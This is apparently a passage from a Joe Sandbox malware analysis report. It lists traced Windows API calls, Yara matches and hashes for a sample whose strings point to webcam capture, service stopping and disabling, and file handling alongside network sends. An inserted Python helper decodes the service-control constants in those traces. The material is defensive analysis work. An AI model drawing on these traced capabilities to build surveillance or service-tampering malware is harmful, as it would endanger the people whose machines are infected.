                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02139D91
                                                  • __freea.LIBCMT ref: 02139D9E
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • __freea.LIBCMT ref: 02139DA7
                                                  • __freea.LIBCMT ref: 02139DCC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1414292761-0
                                                  • Opcode ID: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                  • Instruction ID: b1c47c875d8f2c0c476e0be15cbc17d2a9a97dd9f0a9771bf61a495cc5245294
                                                  • Opcode Fuzzy Hash: a4f5f7d7e0253137201d24c54ea4cf660dd43f3a14d4cde2709bba3cbd133d87
                                                  • Instruction Fuzzy Hash: 6E51F572680216AFEF269F64CC41EBB77ABEF40764F154628FC14D6140EBB6EC50CA60
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                  • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                  • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                  • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
Memory Dump Source
• Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: __cftoe
                                                  • String ID:
                                                  • API String ID: 4189289331-0
                                                  • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                  • Instruction ID: e08e7d13bbb0f0a9d45039c08dbbdb7abcbbb6a850f86051007a9926898bd814
                                                  • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                  • Instruction Fuzzy Hash: 8C51F972980205AFDB269B688C40EAF77EBEF89334F254129F815D6191EB39D900CA64
Memory Dump Source
• Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                  • Instruction ID: 0afd797a50300618fd0d3934aa5cbba155aadf005d8cc3dd054f7378f7e74146
                                                  • Opcode Fuzzy Hash: 15c1efeab650589001bcb3423f25e61575b515edc70c88f8593ca702e347ec5e
                                                  • Instruction Fuzzy Hash: 1A5160B0940305BEEF229F65C881BEEBAFBFF48714F44442DE599B2251D7B698418F24
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: __freea$__alloca_probe_16
                                                  • String ID: a/p$am/pm
                                                  • API String ID: 3509577899-3206640213
                                                  • Opcode ID: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                  • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                  • Opcode Fuzzy Hash: ef0e82919ac3b8602debd5a299a6af15dd8aa9f36d72cee99fb0876ec95c8b0f
                                                  • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                    • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                  • API String ID: 3469354165-462540288
                                                  • Opcode ID: 34750d1dfcef315ceafc5b49fb0bdf248a3e58c9f4d830ec3df60f3ffd46243b
                                                  • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                  • Opcode Fuzzy Hash: 34750d1dfcef315ceafc5b49fb0bdf248a3e58c9f4d830ec3df60f3ffd46243b
                                                  • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 020F40F1
                                                    • Part of subcall function 020F4234: __EH_prolog.LIBCMT ref: 020F4239
Memory Dump Source
• Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: H_prologSleep
                                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                  • API String ID: 3469354165-462540288
                                                  • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                  • Instruction ID: f2837c2704995d266ed733c446e382ab7b6371a8f1d84cec00bbcff3ba2891c5
                                                  • Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                  • Instruction Fuzzy Hash: 4A41F631AC43009BCB95FB3898546AE36A3AF45340F404128EF0997EE4EF749A45EF86
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 020F6E9F
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0), ref: 020F6EE7
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • CloseHandle.KERNEL32(00000000), ref: 020F6F27
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 020F6F44
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008), ref: 020F6F6F
                                                  • DeleteFileW.KERNEL32(00000000), ref: 020F6F7F
                                                    • Part of subcall function 020F47C2: WaitForSingleObject.KERNEL32(?,000000FF,?,?,020F4875,00000000,?,?), ref: 020F47D1
                                                    • Part of subcall function 020F47C2: SetEvent.KERNEL32(?,?,?,020F4875,00000000,?,?), ref: 020F47EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID:
                                                  • API String ID: 1303771098-0
                                                  • Opcode ID: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                  • Instruction ID: 2f7e56b8d57dc722295e343bb94fd44cb06142186bba9580c00d668983e72bf0
                                                  • Opcode Fuzzy Hash: 7cdf14121b30b943d831dc041884720089c76492bcd48607f22f732c73577ab1
                                                  • Instruction Fuzzy Hash: B6318F725483049FC290EF20DD84DDFB7EDFB84711F004A2AFA8592551EB70AA48DF92
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                  • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                  • String ID:
                                                  • API String ID: 493672254-0
                                                  • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                  • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                  • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 02109EFB
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 02109F12
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 02109F1F
                                                  • ControlService.ADVAPI32(00000000,00000001,?), ref: 02109F2E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: Service$Open$CloseControlHandleManager
                                                  • String ID:
                                                  • API String ID: 1243734080-0
                                                  • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction ID: 4ecd3ff61f7337c70af468f094556ce20ebcbdbec1df08c061f3479b6bfb8b89
                                                  • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                  • Instruction Fuzzy Hash: 8D118632585318AFD7116B64ECC4EFF3FACDB45AA2B000035F906921D2DBA4DD06DAB1
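The raw argument slots in the two service-control functions above (ChangeServiceConfigW at 00419E52 and ControlService at 02109F2E) are easier to read once the Win32 constants are decoded. The Python helper below is an added example by the editor; it is not part of the Joe Sandbox report and not code from the sample. It parses API lines in the format this report uses and decodes the constants for the service APIs, CreateFileW and Sleep; the sample lines are copied from the entries above. Caveat: the sandbox records the stack slots present at the call, so slots past a function's real parameter count are caller residue and a `?` is a value the sandbox could not resolve, which is why decoding is by argument index and undecodable slots are skipped.

```python
import re
from typing import Callable, Dict, List, Optional

# One API line of the Joe Sandbox function listing, e.g.
#   • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 02109F12
#   • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
#   • __allrem.LIBCMT ref: 00439789   (CRT helper, no argument list)
API_LINE = re.compile(
    r"^\s*\u2022?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 SDK constants; the sandbox prints argument slots as hex, so decoding is by index.
STANDARD_RIGHTS = {0x10000: "DELETE", 0x20000: "READ_CONTROL",
                   0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
SCM_RIGHTS = {0x1: "SC_MANAGER_CONNECT", 0x2: "SC_MANAGER_CREATE_SERVICE",
              0x4: "SC_MANAGER_ENUMERATE_SERVICE", 0x8: "SC_MANAGER_LOCK",
              0x10: "SC_MANAGER_QUERY_LOCK_STATUS",
              0x20: "SC_MANAGER_MODIFY_BOOT_CONFIG", **STANDARD_RIGHTS}
SERVICE_RIGHTS = {0x1: "SERVICE_QUERY_CONFIG", 0x2: "SERVICE_CHANGE_CONFIG",
                  0x4: "SERVICE_QUERY_STATUS", 0x8: "SERVICE_ENUMERATE_DEPENDENTS",
                  0x10: "SERVICE_START", 0x20: "SERVICE_STOP",
                  0x40: "SERVICE_PAUSE_CONTINUE", 0x80: "SERVICE_INTERROGATE",
                  0x100: "SERVICE_USER_DEFINED_CONTROL", **STANDARD_RIGHTS}
START_TYPES = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START",
               2: "SERVICE_AUTO_START", 3: "SERVICE_DEMAND_START",
               4: "SERVICE_DISABLED", 0xFFFFFFFF: "SERVICE_NO_CHANGE"}
CONTROLS = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
            3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def _flags(table: Dict[int, str]) -> Callable[[int], str]:
    """Bit-mask decoder: names of every set bit, unknown bits left as hex."""
    def decode(value: int) -> str:
        names = [name for bit, name in table.items() if value & bit]
        unknown = value & ~sum(table)
        if unknown:
            names.append(f"0x{unknown:X}")
        return "|".join(names) if names else "0"
    return decode

def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    """Enumeration decoder: symbolic name, or hex if the value is not in the table."""
    return lambda value: table.get(value, f"0x{value:X}")

# (API name, argument index) -> (parameter name, decoder)
DECODERS = {
    ("OpenSCManagerW", 2): ("dwDesiredAccess", _flags(SCM_RIGHTS)),
    ("OpenServiceW", 2): ("dwDesiredAccess", _flags(SERVICE_RIGHTS)),
    ("ChangeServiceConfigW", 2): ("dwStartType", _enum(START_TYPES)),
    ("ControlService", 1): ("dwControl", _enum(CONTROLS)),
    ("CreateFileW", 4): ("dwCreationDisposition", _enum(DISPOSITIONS)),
    ("Sleep", 0): ("dwMilliseconds", lambda v: f"{v} ms"),
}

def parse_api_line(line: str) -> Optional[dict]:
    """Split one report line into API, module, argument slots and call site.
    Slots are the raw stack values the sandbox recorded; '?' becomes None."""
    m = API_LINE.match(line)
    if not m:
        return None
    args: List[Optional[int]] = []
    raw = m.group("args")
    if raw and raw.strip():
        for tok in raw.split(","):
            tok = tok.strip()
            args.append(None if tok == "?" else int(tok, 16))
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": int(m.group("ref"), 16), "subcall": m.group("sub") is not None}

def decode_call(line: str) -> Optional[str]:
    """Render a report line as 'Api(param=SYMBOL)'; None if it is not an API line."""
    parsed = parse_api_line(line)
    if parsed is None:
        return None
    notes = []
    for (api, index), (param, decoder) in DECODERS.items():
        if parsed["api"] == api and index < len(parsed["args"]):
            value = parsed["args"][index]
            if value is not None:  # a '?' slot cannot be decoded
                notes.append(f"{param}={decoder(value)}")
    return f"{parsed['api']}({', '.join(notes)})" if notes else parsed["api"]

def decode_report(text: str) -> List[str]:
    """Decode every API line in a block of report text, skipping the other lines."""
    return [d for d in (decode_call(l) for l in text.splitlines()) if d]

# Constructed sample: the API lines of the two service-control functions above,
# plus one Sleep and one CRT helper line, copied from this report.
SAMPLE_LINES = """
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 02109EFB
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 02109F12
• ControlService.ADVAPI32(00000000,00000001,?), ref: 02109F2E
• Sleep.KERNEL32(00002710), ref: 00419F79
• __allrem.LIBCMT ref: 00439789
"""
```

Run over the sample, `decode_report` shows the 0x400000 function as OpenSCManagerW(SC_MANAGER_CREATE_SERVICE), OpenServiceW(SERVICE_CHANGE_CONFIG), ChangeServiceConfigW(dwStartType=SERVICE_DISABLED), i.e. the opened service has its start type set to disabled, and the 0x20F0000 function as OpenSCManagerW(SC_MANAGER_CONNECT|SC_MANAGER_QUERY_LOCK_STATUS), OpenServiceW(0xF003F), ControlService(SERVICE_CONTROL_STOP). 0xF003F is numerically SC_MANAGER_ALL_ACCESS rather than SERVICE_ALL_ACCESS (0xF01FF), so the decoder lists only the service rights it actually contains. The service-name slot is shown as 00000000 in both listings, so which service is targeted is not recoverable from these lines alone.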
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                  • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                  • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,02128064,02127A18), ref: 0212807B
                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02128089
                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 021280A2
                                                  • SetLastError.KERNEL32(00000000,?,02128064,02127A18), ref: 021280F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
Similarity
                                                  • API ID: ErrorLastValue___vcrt_
                                                  • String ID:
                                                  • API String ID: 3852720340-0
                                                  • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction ID: cbb39c1a4b4c3f490ac76509384bc4c437d798de26156a0eb83d8218d6e98d53
                                                  • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                  • Instruction Fuzzy Hash: 3701AC325993315EE7252775BC887172695FB01775F210339F618851E0EF114869965C
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • _free.LIBCMT ref: 00446EF6
                                                  • _free.LIBCMT ref: 00446F1E
                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • _abort.LIBCMT ref: 00446F3D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                  APIs
                                                  • GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                  • _free.LIBCMT ref: 0213715D
                                                  • _free.LIBCMT ref: 02137185
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 02137192
                                                  • SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                  • _abort.LIBCMT ref: 021371A4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free$_abort
                                                  • String ID:
                                                  • API String ID: 3160817290-0
                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction ID: 7ca4ee0b79a5e46534bed444284f00eda8e23d8238411d23bd7be48aef164f6d
                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                  • Instruction Fuzzy Hash: 78F0A4B71C47107AC61723346C08F2E666B9BC2BB2F250124F968E22D5EF2288438A55
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                  • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                  • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                  • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                  • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                  APIs
                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                  • String ID:
                                                  • API String ID: 221034970-0
                                                  • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                  • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
